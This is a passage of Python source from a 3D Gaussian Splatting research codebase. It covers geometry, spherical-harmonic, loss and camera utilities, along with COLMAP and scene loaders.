max_steps: int, the number of steps during optimization. :return HoF which takes step as input """ def helper(step): if step < 0 or (lr_init == 0.0 and lr_final == 0.0): # Disable this parameter return 0.0 if lr_delay_steps > 0: # A kind of reverse cosine decay. delay_rate = lr_delay_mult + (1 - lr_delay_mult) * np.sin( 0.5 * np.pi * np.clip(step / lr_delay_steps, 0, 1) ) else: delay_rate = 1.0 t = np.clip(step / max_steps, 0, 1) log_lerp = np.exp(np.log(lr_init) * (1 - t) + np.log(lr_final) * t) return delay_rate * log_lerp return helper def strip_lowerdiag(L): uncertainty = torch.zeros((L.shape[0], 6), dtype=torch.float, device="cuda") uncertainty[:, 0] = L[:, 0, 0] uncertainty[:, 1] = L[:, 0, 1] uncertainty[:, 2] = L[:, 0, 2] uncertainty[:, 3] = L[:, 1, 1] uncertainty[:, 4] = L[:, 1, 2] uncertainty[:, 5] = L[:, 2, 2] return uncertainty def strip_symmetric(sym): return strip_lowerdiag(sym) def build_rotation(r): norm = torch.sqrt(r[:,0]*r[:,0] + r[:,1]*r[:,1] + r[:,2]*r[:,2] + r[:,3]*r[:,3]) q = r / norm[:, None] R = torch.zeros((q.size(0), 3, 3), device='cuda') r = q[:, 0] x = q[:, 1] y = q[:, 2] z = q[:, 3] R[:, 0, 0] = 1 - 2 * (y*y + z*z) R[:, 0, 1] = 2 * (x*y - r*z) R[:, 0, 2] = 2 * (x*z + r*y) R[:, 1, 0] = 2 * (x*y + r*z) R[:, 1, 1] = 1 - 2 * (x*x + z*z) R[:, 1, 2] = 2 * (y*z - r*x) R[:, 2, 0] = 2 * (x*z - r*y) R[:, 2, 1] = 2 * (y*z + r*x) R[:, 2, 2] = 1 - 2 * (x*x + y*y) return R def build_scaling_rotation(s, r): L = torch.zeros((s.shape[0], 3, 3), dtype=torch.float, device="cuda") R = build_rotation(r) L[:,0,0] = s[:,0] L[:,1,1] = s[:,1] L[:,2,2] = s[:,2] L = R @ L return L def safe_state(silent): old_f = sys.stdout class F: def __init__(self, silent): self.silent = silent def write(self, x): if not self.silent: if x.endswith("\n"): old_f.write(x.replace("\n", " [{}]\n".format(str(datetime.now().strftime("%d/%m %H:%M:%S"))))) else: old_f.write(x) def flush(self): old_f.flush() sys.stdout = F(silent) random.seed(0) np.random.seed(0) torch.manual_seed(0) torch.cuda.set_device(torch.device("cuda:0")) File: utils/image_utils.py # # Copyright (C) 2023, Inria # GRAPHDECO research group, https://team.inria.fr/graphdeco # All rights reserved. # # This software is free for non-commercial, research and evaluation use # under the terms of the LICENSE.md file. # # For inquiries contact [email protected] # import torch def mse(img1, img2): return (((img1 - img2)) ** 2).view(img1.shape[0], -1).mean(1, keepdim=True) def psnr(img1, img2): mse = (((img1 - img2)) ** 2).view(img1.shape[0], -1).mean(1, keepdim=True) return 20 * torch.log10(1.0 / torch.sqrt(mse)) File: utils/sh_utils.py # Copyright 2021 The PlenOctree Authors. # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # # 1. Redistributions of source code must retain the above copyright notice, # this list of conditions and the following disclaimer. # # 2. Redistributions in binary form must reproduce the above copyright notice, # this list of conditions and the following disclaimer in the documentation # and/or other materials provided with the distribution. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE # ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE # LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR # CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF # SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS # INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN # CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) # ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. import torch C0 = 0.28209479177387814 C1 = 0.4886025119029199 C2 = [ 1.0925484305920792, -1.0925484305920792, 0.31539156525252005, -1.0925484305920792, 0.5462742152960396 ] C3 = [ -0.5900435899266435, 2.890611442640554, -0.4570457994644658, 0.3731763325901154, -0.4570457994644658, 1.445305721320277, -0.5900435899266435 ] C4 = [ 2.5033429417967046, -1.7701307697799304, 0.9461746957575601, -0.6690465435572892, 0.10578554691520431, -0.6690465435572892, 0.47308734787878004, -1.7701307697799304, 0.6258357354491761, ] def eval_sh(deg, sh, dirs): """ Evaluate spherical harmonics at unit directions using hardcoded SH polynomials. Works with torch/np/jnp. ... Can be 0 or more batch dimensions. Args: deg: int SH deg. Currently, 0-3 supported sh: jnp.ndarray SH coeffs [..., C, (deg + 1) ** 2] dirs: jnp.ndarray unit directions [..., 3] Returns: [..., C] """ assert deg <= 4 and deg >= 0 coeff = (deg + 1) ** 2 assert sh.shape[-1] >= coeff result = C0 * sh[..., 0] if deg > 0: x, y, z = dirs[..., 0:1], dirs[..., 1:2], dirs[..., 2:3] result = (result - C1 * y * sh[..., 1] + C1 * z * sh[..., 2] - C1 * x * sh[..., 3]) if deg > 1: xx, yy, zz = x * x, y * y, z * z xy, yz, xz = x * y, y * z, x * z result = (result + C2[0] * xy * sh[..., 4] + C2[1] * yz * sh[..., 5] + C2[2] * (2.0 * zz - xx - yy) * sh[..., 6] + C2[3] * xz * sh[..., 7] + C2[4] * (xx - yy) * sh[..., 8]) if deg > 2: result = (result + C3[0] * y * (3 * xx - yy) * sh[..., 9] + C3[1] * xy * z * sh[..., 10] + C3[2] * y * (4 * zz - xx - yy)* sh[..., 11] + C3[3] * z * (2 * zz - 3 * xx - 3 * yy) * sh[..., 12] + C3[4] * x * (4 * zz - xx - yy) * sh[..., 13] + C3[5] * z * (xx - yy) * sh[..., 14] + C3[6] * x * (xx - 3 * yy) * sh[..., 15]) if deg > 3: result = (result + C4[0] * xy * (xx - yy) * sh[..., 16] + C4[1] * yz * (3 * xx - yy) * sh[..., 17] + C4[2] * xy * (7 * zz - 1) * sh[..., 18] + C4[3] * yz * (7 * zz - 3) * sh[..., 19] + C4[4] * (zz * (35 * zz - 30) + 3) * sh[..., 20] + C4[5] * xz * (7 * zz - 3) * sh[..., 21] + C4[6] * (xx - yy) * (7 * zz - 1) * sh[..., 22] + C4[7] * xz * (xx - 3 * yy) * sh[..., 23] + C4[8] * (xx * (xx - 3 * yy) - yy * (3 * xx - yy)) * sh[..., 24]) return result def RGB2SH(rgb): return (rgb - 0.5) / C0 def SH2RGB(sh): return sh * C0 + 0.5 File: utils/camera_utils.py # # Copyright (C) 2023, Inria # GRAPHDECO research group, https://team.inria.fr/graphdeco # All rights reserved. # # This software is free for non-commercial, research and evaluation use # under the terms of the LICENSE.md file. # # For inquiries contact [email protected] # from scene.cameras import Camera import numpy as np from utils.general_utils import PILtoTorch from utils.graphics_utils import fov2focal WARNED = False def loadCam(args, id, cam_info, resolution_scale): orig_w, orig_h = cam_info.image.size if args.resolution in [1, 2, 4, 8]: resolution = round(orig_w/(resolution_scale * args.resolution)), round(orig_h/(resolution_scale * args.resolution)) else: # should be a type that converts to float if args.resolution == -1: if orig_w > 1600: global WARNED if not WARNED: print("[ INFO ] Encountered quite large input images (>1.6K pixels width), rescaling to 1.6K.\n " "If this is not desired, please explicitly specify '--resolution/-r' as 1") WARNED = True global_down = orig_w / 1600 else: global_down = 1 else: global_down = orig_w / args.resolution scale = float(global_down) * float(resolution_scale) resolution = (int(orig_w / scale), int(orig_h / scale)) resized_image_rgb = PILtoTorch(cam_info.image, resolution) gt_image = resized_image_rgb[:3, ...] loaded_mask = None if resized_image_rgb.shape[1] == 4: loaded_mask = resized_image_rgb[3:4, ...] return Camera(colmap_id=cam_info.uid, R=cam_info.R, T=cam_info.T, FoVx=cam_info.FovX, FoVy=cam_info.FovY, image=gt_image, gt_alpha_mask=loaded_mask, image_name=cam_info.image_name, uid=id, data_device=args.data_device) def cameraList_from_camInfos(cam_infos, resolution_scale, args): camera_list = [] for id, c in enumerate(cam_infos): camera_list.append(loadCam(args, id, c, resolution_scale)) return camera_list def camera_to_JSON(id, camera : Camera): Rt = np.zeros((4, 4)) Rt[:3, :3] = camera.R.transpose() Rt[:3, 3] = camera.T Rt[3, 3] = 1.0 W2C = np.linalg.inv(Rt) pos = W2C[:3, 3] rot = W2C[:3, :3] serializable_array_2d = [x.tolist() for x in rot] camera_entry = { 'id' : id, 'img_name' : camera.image_name, 'width' : camera.width, 'height' : camera.height, 'position': pos.tolist(), 'rotation': serializable_array_2d, 'fy' : fov2focal(camera.FovY, camera.height), 'fx' : fov2focal(camera.FovX, camera.width) } return camera_entry File: utils/system_utils.py # # Copyright (C) 2023, Inria # GRAPHDECO research group, https://team.inria.fr/graphdeco # All rights reserved. # # This software is free for non-commercial, research and evaluation use # under the terms of the LICENSE.md file. # # For inquiries contact [email protected] # from errno import EEXIST from os import makedirs, path import os def mkdir_p(folder_path): # Creates a directory. equivalent to using mkdir -p on the command line try: makedirs(folder_path) except OSError as exc: # Python >2.5 if exc.errno == EEXIST and path.isdir(folder_path): pass else: raise def searchForMaxIteration(folder): saved_iters = [int(fname.split("_")[-1]) for fname in os.listdir(folder)] return max(saved_iters) File: utils/graphics_utils.py # # Copyright (C) 2023, Inria # GRAPHDECO research group, https://team.inria.fr/graphdeco # All rights reserved. # # This software is free for non-commercial, research and evaluation use # under the terms of the LICENSE.md file. # # For inquiries contact [email protected] # import torch import math import numpy as np from typing import NamedTuple class BasicPointCloud(NamedTuple): points : np.array colors : np.array normals : np.array def geom_transform_points(points, transf_matrix): P, _ = points.shape ones = torch.ones(P, 1, dtype=points.dtype, device=points.device) points_hom = torch.cat([points, ones], dim=1) points_out = torch.matmul(points_hom, transf_matrix.unsqueeze(0)) denom = points_out[..., 3:] + 0.0000001 return (points_out[..., :3] / denom).squeeze(dim=0) def getWorld2View(R, t): Rt = np.zeros((4, 4)) Rt[:3, :3] = R.transpose() Rt[:3, 3] = t Rt[3, 3] = 1.0 return np.float32(Rt) def getWorld2View2(R, t, translate=np.array([.0, .0, .0]), scale=1.0): Rt = np.zeros((4, 4)) Rt[:3, :3] = R.transpose() Rt[:3, 3] = t Rt[3, 3] = 1.0 C2W = np.linalg.inv(Rt) cam_center = C2W[:3, 3] cam_center = (cam_center + translate) * scale C2W[:3, 3] = cam_center Rt = np.linalg.inv(C2W) return np.float32(Rt) def getProjectionMatrix(znear, zfar, fovX, fovY): tanHalfFovY = math.tan((fovY / 2)) tanHalfFovX = math.tan((fovX / 2)) top = tanHalfFovY * znear bottom = -top right = tanHalfFovX * znear left = -right P = torch.zeros(4, 4) z_sign = 1.0 P[0, 0] = 2.0 * znear / (right - left) P[1, 1] = 2.0 * znear / (top - bottom) P[0, 2] = (right + left) / (right - left) P[1, 2] = (top + bottom) / (top - bottom) P[3, 2] = z_sign P[2, 2] = z_sign * zfar / (zfar - znear) P[2, 3] = -(zfar * znear) / (zfar - znear) return P def fov2focal(fov, pixels): return pixels / (2 * math.tan(fov / 2)) def focal2fov(focal, pixels): return 2*math.atan(pixels/(2*focal)) File: utils/loss_utils.py # # Copyright (C) 2023, Inria # GRAPHDECO research group, https://team.inria.fr/graphdeco # All rights reserved. # # This software is free for non-commercial, research and evaluation use # under the terms of the LICENSE.md file. # # For inquiries contact [email protected] # import torch import torch.nn.functional as F from torch.autograd import Variable from math import exp def l1_loss(network_output, gt): return torch.abs((network_output - gt)).mean() def l2_loss(network_output, gt): return ((network_output - gt) ** 2).mean() def gaussian(window_size, sigma): gauss = torch.Tensor([exp(-(x - window_size // 2) ** 2 / float(2 * sigma ** 2)) for x in range(window_size)]) return gauss / gauss.sum() def create_window(window_size, channel): _1D_window = gaussian(window_size, 1.5).unsqueeze(1) _2D_window = _1D_window.mm(_1D_window.t()).float().unsqueeze(0).unsqueeze(0) window = Variable(_2D_window.expand(channel, 1, window_size, window_size).contiguous()) return window def ssim(img1, img2, window_size=11, size_average=True): channel = img1.size(-3) window = create_window(window_size, channel) if img1.is_cuda: window = window.cuda(img1.get_device()) window = window.type_as(img1) return _ssim(img1, img2, window, window_size, channel, size_average) def _ssim(img1, img2, window, window_size, channel, size_average=True): mu1 = F.conv2d(img1, window, padding=window_size // 2, groups=channel) mu2 = F.conv2d(img2, window, padding=window_size // 2, groups=channel) mu1_sq = mu1.pow(2) mu2_sq = mu2.pow(2) mu1_mu2 = mu1 * mu2 sigma1_sq = F.conv2d(img1 * img1, window, padding=window_size // 2, groups=channel) - mu1_sq sigma2_sq = F.conv2d(img2 * img2, window, padding=window_size // 2, groups=channel) - mu2_sq sigma12 = F.conv2d(img1 * img2, window, padding=window_size // 2, groups=channel) - mu1_mu2 C1 = 0.01 ** 2 C2 = 0.03 ** 2 ssim_map = ((2 * mu1_mu2 + C1) * (2 * sigma12 + C2)) / ((mu1_sq + mu2_sq + C1) * (sigma1_sq + sigma2_sq + C2)) if size_average: return ssim_map.mean() else: return ssim_map.mean(1).mean(1).mean(1) File: scene/__init__.py # # Copyright (C) 2023, Inria # GRAPHDECO research group, https://team.inria.fr/graphdeco # All rights reserved. # # This software is free for non-commercial, research and evaluation use # under the terms of the LICENSE.md file. # # For inquiries contact [email protected] # import os import random import json from utils.system_utils import searchForMaxIteration from scene.dataset_readers import sceneLoadTypeCallbacks from scene.gaussian_model import GaussianModel from arguments import ModelParams from utils.camera_utils import cameraList_from_camInfos, camera_to_JSON class Scene: gaussians : GaussianModel def __init__(self, args : ModelParams, gaussians : GaussianModel, load_iteration=None, shuffle=True, resolution_scales=[1.0]): """b :param path: Path to colmap scene main folder. """ self.model_path = args.model_path self.loaded_iter = None self.gaussians = gaussians if load_iteration: if load_iteration == -1: self.loaded_iter = searchForMaxIteration(os.path.join(self.model_path, "point_cloud")) else: self.loaded_iter = load_iteration print("Loading trained model at iteration {}".format(self.loaded_iter)) self.train_cameras = {} self.test_cameras = {} if os.path.exists(os.path.join(args.source_path, "sparse")): scene_info = sceneLoadTypeCallbacks["Colmap"](args.source_path, args.images, args.eval) elif os.path.exists(os.path.join(args.source_path, "transforms_train.json")): print("Found transforms_train.json file, assuming Blender data set!") scene_info = sceneLoadTypeCallbacks["Blender"](args.source_path, args.white_background, args.eval) else: assert False, "Could not recognize scene type!" if not self.loaded_iter: with open(scene_info.ply_path, 'rb') as src_file, open(os.path.join(self.model_path, "input.ply") , 'wb') as dest_file: dest_file.write(src_file.read()) json_cams = [] camlist = [] if scene_info.test_cameras: camlist.extend(scene_info.test_cameras) if scene_info.train_cameras: camlist.extend(scene_info.train_cameras) for id, cam in enumerate(camlist): json_cams.append(camera_to_JSON(id, cam)) with open(os.path.join(self.model_path, "cameras.json"), 'w') as file: json.dump(json_cams, file) if shuffle: random.shuffle(scene_info.train_cameras) # Multi-res consistent random shuffling random.shuffle(scene_info.test_cameras) # Multi-res consistent random shuffling self.cameras_extent = scene_info.nerf_normalization["radius"] for resolution_scale in resolution_scales: print("Loading Training Cameras") self.train_cameras[resolution_scale] = cameraList_from_camInfos(scene_info.train_cameras, resolution_scale, args) print("Loading Test Cameras") self.test_cameras[resolution_scale] = cameraList_from_camInfos(scene_info.test_cameras, resolution_scale, args) if self.loaded_iter: self.gaussians.load_ply(os.path.join(self.model_path, "point_cloud", "iteration_" + str(self.loaded_iter), "point_cloud.ply")) else: self.gaussians.create_from_pcd(scene_info.point_cloud, self.cameras_extent) def save(self, iteration): point_cloud_path = os.path.join(self.model_path, "point_cloud/iteration_{}".format(iteration)) self.gaussians.save_ply(os.path.join(point_cloud_path, "point_cloud.ply")) def getTrainCameras(self, scale=1.0): return self.train_cameras[scale] def getTestCameras(self, scale=1.0): return self.test_cameras[scale] File: scene/colmap_loader.py # # Copyright (C) 2023, Inria # GRAPHDECO research group, https://team.inria.fr/graphdeco # All rights reserved. # # This software is free for non-commercial, research and evaluation use # under the terms of the LICENSE.md file. # # For inquiries contact [email protected] # import numpy as np import collections import struct CameraModel = collections.namedtuple( "CameraModel", ["model_id", "model_name", "num_params"]) Camera = collections.namedtuple( "Camera", ["id", "model", "width", "height", "params"]) BaseImage = collections.namedtuple( "Image", ["id", "qvec", "tvec", "camera_id", "name", "xys", "point3D_ids"]) Point3D = collections.namedtuple( "Point3D", ["id", "xyz", "rgb", "error", "image_ids", "point2D_idxs"]) CAMERA_MODELS = { CameraModel(model_id=0, model_name="SIMPLE_PINHOLE", num_params=3), CameraModel(model_id=1, model_name="PINHOLE", num_params=4), CameraModel(model_id=2, model_name="SIMPLE_RADIAL", num_params=4), CameraModel(model_id=3, model_name="RADIAL", num_params=5), CameraModel(model_id=4, model_name="OPENCV", num_params=8), CameraModel(model_id=5, model_name="OPENCV_FISHEYE", num_params=8), CameraModel(model_id=6, model_name="FULL_OPENCV", num_params=12), CameraModel(model_id=7, model_name="FOV", num_params=5), CameraModel(model_id=8, model_name="SIMPLE_RADIAL_FISHEYE", num_params=4), CameraModel(model_id=9, model_name="RADIAL_FISHEYE", num_params=5), CameraModel(model_id=10, model_name="THIN_PRISM_FISHEYE", num_params=12) } CAMERA_MODEL_IDS = dict([(camera_model.model_id, camera_model) for camera_model in CAMERA_MODELS]) CAMERA_MODEL_NAMES = dict([(camera_model.model_name, camera_model) for camera_model in CAMERA_MODELS]) def qvec2rotmat(qvec): return np.array([ [1 - 2 * qvec[2]**2 - 2 * qvec[3]**2, 2 * qvec[1] * qvec[2] - 2 * qvec[0] * qvec[3], 2 * qvec[3] * qvec[1] + 2 * qvec[0] * qvec[2]], [2 * qvec[1] * qvec[2] + 2 * qvec[0] * qvec[3], 1 - 2 * qvec[1]**2 - 2 * qvec[3]**2, 2 * qvec[2] * qvec[3] - 2 * qvec[0] * qvec[1]], [2 * qvec[3] * qvec[1] - 2 * qvec[0] * qvec[2], 2 * qvec[2] * qvec[3] + 2 * qvec[0] * qvec[1], 1 - 2 * qvec[1]**2 - 2 * qvec[2]**2]]) def rotmat2qvec(R): Rxx, Ryx, Rzx, Rxy, Ryy, Rzy, Rxz, Ryz, Rzz = R.flat K = np.array([ [Rxx - Ryy - Rzz, 0, 0, 0], [Ryx + Rxy, Ryy - Rxx - Rzz, 0, 0], [Rzx + Rxz, Rzy + Ryz, Rzz - Rxx - Ryy, 0], [Ryz - Rzy, Rzx - Rxz, Rxy - Ryx, Rxx + Ryy + Rzz]]) / 3.0 eigvals, eigvecs = np.linalg.eigh(K) qvec = eigvecs[[3, 0, 1, 2], np.argmax(eigvals)] if qvec[0] < 0: qvec *= -1 return qvec class Image(BaseImage): def qvec2rotmat(self): return qvec2rotmat(self.qvec) def read_next_bytes(fid, num_bytes, format_char_sequence, endian_character="<"): """Read and unpack the next bytes from a binary file. :param fid: :param num_bytes: Sum of combination of {2, 4, 8}, e.g. 2, 6, 16, 30, etc. :param format_char_sequence: List of {c, e, f, d, h, H, i, I, l, L, q, Q}. :param endian_character: Any of {@, =, <, >, !} :return: Tuple of read and unpacked values. """ data = fid.read(num_bytes) return struct.unpack(endian_character + format_char_sequence, data) def read_points3D_text(path): """ see: src/base/reconstruction.cc void Reconstruction::ReadPoints3DText(const std::string& path) void Reconstruction::WritePoints3DText(const std::string& path) """ xyzs = None rgbs = None errors = None num_points = 0 with open(path, "r") as fid: while True: line = fid.readline() if not line: break line = line.strip() if len(line) > 0 and line[0] != "#": num_points += 1 xyzs = np.empty((num_points, 3)) rgbs = np.empty((num_points, 3)) errors = np.empty((num_points, 1)) count = 0 with open(path, "r") as fid: while True: line = fid.readline() if not line: break line = line.strip() if len(line) > 0 and line[0] != "#": elems = line.split() xyz = np.array(tuple(map(float, elems[1:4]))) rgb = np.array(tuple(map(int, elems[4:7]))) error = np.array(float(elems[7])) xyzs[count] = xyz rgbs[count] = rgb errors[count] = error count += 1 return xyzs, rgbs, errors def read_points3D_binary(path_to_model_file): """ see: src/base/reconstruction.cc void Reconstruction::ReadPoints3DBinary(const std::string& path) void Reconstruction::WritePoints3DBinary(const std::string& path) """ with open(path_to_model_file, "rb") as fid: num_points = read_next_bytes(fid, 8, "Q")[0] xyzs = np.empty((num_points, 3)) rgbs = np.empty((num_points, 3)) errors = np.empty((num_points, 1)) for p_id in range(num_points): binary_point_line_properties = read_next_bytes( fid, num_bytes=43, format_char_sequence="QdddBBBd") xyz = np.array(binary_point_line_properties[1:4]) rgb = np.array(binary_point_line_properties[4:7]) error = np.array(binary_point_line_properties[7]) track_length = read_next_bytes( fid, num_bytes=8, format_char_sequence="Q")[0] track_elems = read_next_bytes( fid, num_bytes=8*track_length, format_char_sequence="ii"*track_length) xyzs[p_id] = xyz rgbs[p_id] = rgb errors[p_id] = error return xyzs, rgbs, errors def read_intrinsics_text(path): """ Taken from https://github.com/colmap/colmap/blob/dev/scripts/python/read_write_model.py """ cameras = {} with open(path, "r") as fid: while True: line = fid.readline() if not line: break line = line.strip() if len(line) > 0 and line[0] != "#": elems = line.split() camera_id = int(elems[0]) model = elems[1] assert model == "PINHOLE", "While the loader support other types, the rest of the code assumes PINHOLE" width = int(elems[2]) height = int(elems[3]) params = np.array(tuple(map(float, elems[4:]))) cameras[camera_id] = Camera(id=camera_id, model=model, width=width, height=height, params=params) return cameras def read_extrinsics_binary(path_to_model_file): """ see: src/base/reconstruction.cc void Reconstruction::ReadImagesBinary(const std::string& path) void Reconstruction::WriteImagesBinary(const std::string& path) """ images = {} with open(path_to_model_file, "rb") as fid: num_reg_images = read_next_bytes(fid, 8, "Q")[0] for _ in range(num_reg_images): binary_image_properties = read_next_bytes( fid, num_bytes=64, format_char_sequence="idddddddi") image_id = binary_image_properties[0] qvec = np.array(binary_image_properties[1:5]) tvec = np.array(binary_image_properties[5:8]) camera_id = binary_image_properties[8] image_name = "" current_char = read_next_bytes(fid, 1, "c")[0] while current_char != b"\x00": # look for the ASCII 0 entry image_name += current_char.decode("utf-8") current_char = read_next_bytes(fid, 1, "c")[0] num_points2D = read_next_bytes(fid, num_bytes=8, format_char_sequence="Q")[0] x_y_id_s = read_next_bytes(fid, num_bytes=24*num_points2D, format_char_sequence="ddq"*num_points2D) xys = np.column_stack([tuple(map(float, x_y_id_s[0::3])), tuple(map(float, x_y_id_s[1::3]))]) point3D_ids = np.array(tuple(map(int, x_y_id_s[2::3]))) images[image_id] = Image( id=image_id, qvec=qvec, tvec=tvec, camera_id=camera_id, name=image_name, xys=xys, point3D_ids=point3D_ids) return images def read_intrinsics_binary(path_to_model_file): """ see: src/base/reconstruction.cc void Reconstruction::WriteCamerasBinary(const std::string& path) void Reconstruction::ReadCamerasBinary(const std::string& path) """ cameras = {} with open(path_to_model_file, "rb") as fid: num_cameras = read_next_bytes(fid, 8, "Q")[0] for _ in range(num_cameras): camera_properties = read_next_bytes( fid, num_bytes=24, format_char_sequence="iiQQ") camera_id = camera_properties[0] model_id = camera_properties[1] model_name = CAMERA_MODEL_IDS[camera_properties[1]].model_name width = camera_properties[2] height = camera_properties[3] num_params = CAMERA_MODEL_IDS[model_id].num_params params = read_next_bytes(fid, num_bytes=8*num_params, format_char_sequence="d"*num_params) cameras[camera_id] = Camera(id=camera_id, model=model_name, width=width, height=height, params=np.array(params)) assert len(cameras) == num_cameras return cameras def read_extrinsics_text(path): """ Taken from https://github.com/colmap/colmap/blob/dev/scripts/python/read_write_model.py """ images = {} with open(path, "r") as fid: while True: line = fid.readline() if not line: break line = line.strip() if len(line) > 0 and line[0] != "#": elems = line.split() image_id = int(elems[0]) qvec = np.array(tuple(map(float, elems[1:5]))) tvec = np.array(tuple(map(float, elems[5:8]))) camera_id = int(elems[8]) image_name = elems[9] elems = fid.readline().split() xys = np.column_stack([tuple(map(float, elems[0::3])), tuple(map(float, elems[1::3]))]) point3D_ids = np.array(tuple(map(int, elems[2::3]))) images[image_id] = Image( id=image_id, qvec=qvec, tvec=tvec, camera_id=camera_id, name=image_name, xys=xys, point3D_ids=point3D_ids) return images def read_colmap_bin_array(path): """ Taken from https://github.com/colmap/colmap/blob/dev/scripts/python/read_dense.py :param path: path to the colmap binary file. :return: nd array with the floating point values in the value """ with open(path, "rb") as fid: width, height, channels = np.genfromtxt(fid, delimiter="&", max_rows=1, usecols=(0, 1, 2), dtype=int) fid.seek(0) num_delimiter = 0 byte = fid.read(1) while True: if byte == b"&": num_delimiter += 1 if num_delimiter >= 3: break byte = fid.read(1) array = np.fromfile(fid, np.float32) array = array.reshape((width, height, channels), order="F") return np.transpose(array, (1, 0, 2)).squeeze() File: scene/cameras.py # # Copyright (C) 2023, Inria # GRAPHDECO research group, https://team.inria.fr/graphdeco # All rights reserved. # # This software is free for non-commercial, research and evaluation use # under the terms of the LICENSE.md file. # # For inquiries contact [email protected] # import torch from torch import nn import numpy as np from utils.graphics_utils import getWorld2View2, getProjectionMatrix class Camera(nn.Module): def __init__(self, colmap_id, R, T, FoVx, FoVy, image, gt_alpha_mask, image_name, uid, trans=np.array([0.0, 0.0, 0.0]), scale=1.0, data_device = "cuda" ): super(Camera, self).__init__() self.uid = uid self.colmap_id = colmap_id self.R = R self.T = T self.FoVx = FoVx self.FoVy = FoVy self.image_name = image_name try: self.data_device = torch.device(data_device) except Exception as e: print(e) print(f"[Warning] Custom device {data_device} failed, fallback to default cuda device" ) self.data_device = torch.device("cuda") self.original_image = image.clamp(0.0, 1.0).to(self.data_device) self.image_width = self.original_image.shape[2] self.image_height = self.original_image.shape[1] if gt_alpha_mask is not None: self.original_image *= gt_alpha_mask.to(self.data_device) else: self.original_image *= torch.ones((1, self.image_height, self.image_width), device=self.data_device) self.zfar = 100.0 self.znear = 0.01 self.trans = trans self.scale = scale self.world_view_transform = torch.tensor(getWorld2View2(R, T, trans, scale)).transpose(0, 1).cuda() self.projection_matrix = getProjectionMatrix(znear=self.znear, zfar=self.zfar, fovX=self.FoVx, fovY=self.FoVy).transpose(0,1).cuda() self.full_proj_transform = (self.world_view_transform.unsqueeze(0).bmm(self.projection_matrix.unsqueeze(0))).squeeze(0) self.camera_center = self.world_view_transform.inverse()[3, :3] class MiniCam: def __init__(self, width, height, fovy, fovx, znear, zfar, world_view_transform, full_proj_transform): self.image_width = width self.image_height = height self.FoVy = fovy self.FoVx = fovx self.znear = znear self.zfar = zfar self.world_view_transform = world_view_transform self.full_proj_transform = full_proj_transform view_inv = torch.inverse(self.world_view_transform) self.camera_center = view_inv[3][:3] File: scene/dataset_readers.py # # Copyright (C) 2023, Inria # GRAPHDECO research group, https://team.inria.fr/graphdeco # All rights reserved. # # This software is free for non-commercial, research and evaluation use # under the terms of the LICENSE.md file. # # For inquiries contact [email protected] # import os import sys from PIL import Image from typing import NamedTuple from scene.colmap_loader import read_extrinsics_text, read_intrinsics_text, qvec2rotmat, \ read_extrinsics_binary, read_intrinsics_binary, read_points3D_binary, read_points3D_text from utils.graphics_utils import getWorld2View2, focal2fov, fov2focal import numpy as np import json from pathlib import Path from plyfile import PlyData, PlyElement from utils.sh_utils import SH2RGB from scene.gaussian_model import BasicPointCloud class CameraInfo(NamedTuple): uid: int R: np.array T: np.array FovY: np.array FovX: np.array image: np.array image_path: str image_name: str width: int height: int class SceneInfo(NamedTuple): point_cloud: BasicPointCloud train_cameras: list test_cameras: list nerf_normalization: dict ply_path: str def getNerfppNorm(cam_info): def get_center_and_diag(cam_centers): cam_centers = np.hstack(cam_centers) avg_cam_center = np.mean(cam_centers, axis=1, keepdims=True) center = avg_cam_center dist = np.linalg.norm(cam_centers - center, axis=0, keepdims=True) diagonal = np.max(dist) return center.flatten(), diagonal cam_centers = [] for cam in cam_info: W2C = getWorld2View2(cam.R, cam.T) C2W = np.linalg.inv(W2C) cam_centers.append(C2W[:3, 3:4]) center, diagonal = get_center_and_diag(cam_centers) radius = diagonal * 1.1 translate = -center return {"translate": translate, "radius": radius} def readColmapCameras(cam_extrinsics, cam_intrinsics, images_folder): cam_infos = [] for idx, key in enumerate(cam_extrinsics): sys.stdout.write('\r') # the exact output you're looking for: sys.stdout.write("Reading camera {}/{}".format(idx+1, len(cam_extrinsics))) sys.stdout.flush() extr = cam_extrinsics[key] intr = cam_intrinsics[extr.camera_id] height = intr.height width = intr.width uid = intr.id R = np.transpose(qvec2rotmat(extr.qvec)) T = np.array(extr.tvec) if intr.model=="SIMPLE_PINHOLE": focal_length_x = intr.params[0] FovY = focal2fov(focal_length_x, height) FovX = focal2fov(focal_length_x, width) elif intr.model=="PINHOLE": focal_length_x = intr.params[0] focal_length_y = intr.params[1] FovY = focal2fov(focal_length_y, height) FovX = focal2fov(focal_length_x, width) else: assert False, "Colmap camera model not handled: only undistorted datasets (PINHOLE or SIMPLE_PINHOLE cameras) supported!" image_path = os.path.join(images_folder, os.path.basename(extr.name)) image_name = os.path.basename(image_path).split(".")[0] image = Image.open(image_path) cam_info = CameraInfo(uid=uid, R=R, T=T, FovY=FovY, FovX=FovX, image=image, image_path=image_path, image_name=image_name, width=width, height=height) cam_infos.append(cam_info) sys.stdout.write('\n') return cam_infos def fetchPly(path): plydata = PlyData.read(path) vertices = plydata['vertex'] positions = np.vstack([vertices['x'], vertices['y'], vertices['z']]).T colors = np.vstack([vertices['red'], vertices['green'], vertices['blue']]).T / 255.0 normals = np.vstack([vertices['nx'], vertices['ny'], vertices['nz']]).T return BasicPointCloud(points=positions, colors=colors, normals=normals) def storePly(path, xyz, rgb): # Define the dtype for the structured array dtype = [('x', 'f4'), ('y', 'f4'), ('z', 'f4'), ('nx', 'f4'), ('ny', 'f4'), ('nz', 'f4'), ('red', 'u1'), ('green', 'u1'), ('blue', 'u1')] normals = 